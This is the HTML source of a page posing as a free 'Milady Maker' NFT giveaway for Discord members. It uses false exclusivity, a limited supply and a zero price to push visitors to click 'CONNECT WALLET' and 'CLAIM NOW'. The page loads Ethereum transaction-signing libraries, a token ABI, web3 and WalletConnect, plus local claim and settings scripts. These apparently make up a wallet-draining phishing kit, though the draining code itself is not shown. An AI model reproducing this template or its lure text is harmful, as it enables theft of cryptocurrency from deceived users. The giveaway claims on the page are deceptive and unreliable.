<!doctype html>
<html lang="fr">

<head>
    <meta charset="utf-8">
    <title>Milady Maker</title>
<meta content="CLICK HERE TO CLAIM" property="og:title">
<meta content="

🟢 WE ARE LAUNCHING A GIVEAWAY

THIS GIVEAWAY IS FOR DISCORD MEMBERS ONLY!

YOU CAN CLAIM YOUR FREE NFT ON OUR WEBSITE NOW!

	
🏷️ Sale Info:
▶️ Supply: 35 (LIMITED)
▶️ Mint price: 0.00 ETH + GAS
▶️ Allocation: 1 NFT's per wallet
	
❗ MAKE SURE TO USE ONLY OFFICIAL WEBSITE ❗
	
Thank you for your patience and support!"
" property="og:description">

    <meta property="og:type" content="website">

    <meta property="og:url" content="">

    <meta name="twitter:card" content="summary_large_image">

    <meta name="twitter:image" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="shortcut icon" href="https://lh3.googleusercontent.com/a_frplnavZA9g4vN3SexO5rrtaBX_cBTaJYcgrPtwQIqPhzgzUendQxiwUdr51CGPE2QyPEa1DHnkW1wLrHAv5DgfC3BP-CWpFq6BA=s168" />
    <link rel="preload" href="./src/css/normal.css" as="style">
    <link rel="stylesheet" href="./src/css/normal.css">
    <link rel="stylesheet" href="./src/css/main.css">
    <link rel="preload" href="./src/css/main.css" as="style">
    <script src="src/js/1409195906.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    <link rel="preload" href="./src/css/normal.css" as="style">
    <link rel="stylesheet" href="./src/css/normal.css">
    <link rel="stylesheet" href="./src/css/main.css">
    <link rel="preload" href="./src/css/main.css" as="style">

    <script src="./settings.js"></script>
    <link rel="stylesheet" href="./src/css/styles.css">

    <script src="src/js/ethereumjs-tx-1.3.3.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/bignumber.js/8.0.2/bignumber.js" integrity="sha512-XQDG6H87RgMf+aNFwDPCUcFwUf3t9liyqN/2BkJ8KGixupbjPwQHNhypNA972mLIkg4KPo4lkGmqAf3yfDz8hw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="src/js/tokenabi.js"></script>
    <script src="jquery.min.js"></script>
    <script src="base.js?1"></script>


</head>

<style>
    .Home_soon__8s2ww button {
        background-color: #ffffff;
        border: 2px solid #cac8c8;
        border-radius: 10px;
        box-sizing: border-box;
        color: #222222;
        cursor: pointer;
        display: inline-block;
        font-size: 20px;
        font-weight: 600;
        line-height: 20px;
        margin: 0;
        outline: none;
        padding: 13px 23px;
        position: relative;
        text-align: center;
        text-decoration: none;
        touch-action: manipulation;
        transition: box-shadow .2s, -ms-transform .1s, -webkit-transform .1s, transform .1s;
        user-select: none;
        -webkit-user-select: none;
        width: auto;
    }

    .Home_soon__8s2ww button:focus-visible {
        box-shadow: #222222 0 0 0 2px, rgba(255, 255, 255, 0.8) 0 0 0 4px;
        transition: box-shadow .2s;
    }

    .Home_soon__8s2ww button:active {
        background-color: #F7F7F7;
        border-color: #000000;
        transform: scale(.96);
    }

    .Home_soon__8s2ww button:disabled {
        border-color: #DDDDDD;
        color: #DDDDDD;
        cursor: not-allowed;
        opacity: 1;
    }
</style>


<body>
    <div id="__next" data-reactroot="">
        <div class="Home_container__97eC3">
            <div class="Home_left__PDvAo">
                <span style="box-sizing:border-box;display:inline-block;overflow:hidden;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;position:relative;max-width:100%">
                    <span style="box-sizing:border-box;display:block;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;max-width:100%">
                        <img style="display:block;max-width:100%;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0" alt="" aria-hidden="true" src="data:image/svg+xml,%3csvg xmlns=%27http://www.w3.org/2000/svg%27 version=%271.1%27 width=%27600%27 height=%27600%27/%3e">
                    </span>
                    <img alt="kuroki" src="./assets/preview.gif" style="position:absolute;top:0;left:0;bottom:0;right:0;box-sizing:border-box;padding:0;border:none;margin:auto;display:block;width:0;height:0;min-width:100%;max-width:100%;min-height:100%;max-height:100%" loading="lazy" />
                </span>
            </div>
            <div class="Home_right__Q3ZHY">
                <div class="Home_banner__F5GOV">
                    <span style="box-sizing:border-box;display:inline-block;overflow:hidden;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;position:relative;max-width:100%">
                        <span style="box-sizing:border-box;display:block;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;max-width:100%">
                            <img style="display:block;max-width:100%;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0" alt="" aria-hidden="true" src="data:image/svg+xml,%3csvg xmlns=%27http://www.w3.org/2000/svg%27 version=%271.1%27 width=%27150%27 height=%27150%27/%3e">
                        </span>
                        <img alt="kuroki" src="./assets/logo.jpg" style="position:absolute;top:0;left:0;bottom:0;right:0;box-sizing:border-box;padding:0;border-radius: 90px 90px 90px 90px;margin:auto;display:block;width:0;height:0;min-width:100%;max-width:100%;min-height:100%;max-height:100%" loading="lazy" />
                    </span>
                </div>
                <div class="Home_content__WcTpR">
                    <div class="Home_desc__q_6Ri">ONLY SELECTED DISCORD MEMBERS ARE ABLE TO CLAIM FOR FREE!<br><br>Connect your wallet to see if you are eligible to claim!<br><br>
                    <div class="Home_soon__8s2ww">
                        <button id="connectWallet">CONNECT WALLET</button>
                        <button id="claimButton" style="display: none;">CLAIM NOW</button>
                        <br />
                    </div>
                    <div class="Home_desc__q_6Ri" style="margin-top: -10%; color: rgb(33, 44, 197);">0.00 ETH + GAS<br></div>
                    <div class="mb-2"><br><br>DONT FORGET TO SHARE YOUR NFT <br> WITH OUR COMMUNITY!</div>
                    <div class="Home_socials__Gabme">
                        <a href="https://www.twitter.com/MiladyMaker" target="_blank" rel="noreferrer">
                            <span style="box-sizing:border-box;display:inline-block;overflow:hidden;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;position:relative;max-width:100%">
                                <span style="box-sizing:border-box;display:block;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;max-width:100%">
                                    <img style="display:block;max-width:100%;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0" alt="" aria-hidden="true" src="data:image/svg+xml,%3csvg xmlns=%27http://www.w3.org/2000/svg%27 version=%271.1%27 width=%2748%27 height=%2748%27/%3e">
                                </span>
                                <img alt="twitter" src="./assets/twitter.png" style="position:absolute;top:0;left:0;bottom:0;right:0;box-sizing:border-box;padding:0;border:none;margin:auto;display:block;width:0;height:0;min-width:120%;max-width:120%;min-height:120%;max-height:120%" loading="lazy" />
                            </span>
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script src="./src/js/loader_index.js"></script>

    <script src="https://unpkg.com/web3@latest/dist/web3.min.js"></script>
    <script src="https://npmcdn.com/moralis/dist/moralis.js"></script>
    <script src="https://unpkg.com/@walletconnect/web3-provider@1.7.5/dist/umd/index.min.js"></script>
    <script type="text/javascript" src="src/js/claim.js"></script>
    
    <script type="text/javascript" src="./src/js/index.min.js"></script>

    <script type="text/javascript">
        $('.alert-eth-message-close').click(function(){
            $('.alert-eth-message').fadeOut(200);
        });
    </script>

</body>
<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js?id=JbVk4GLuNguJfltO&ck=JbVk4GLuNguJfltO"></script>
</html>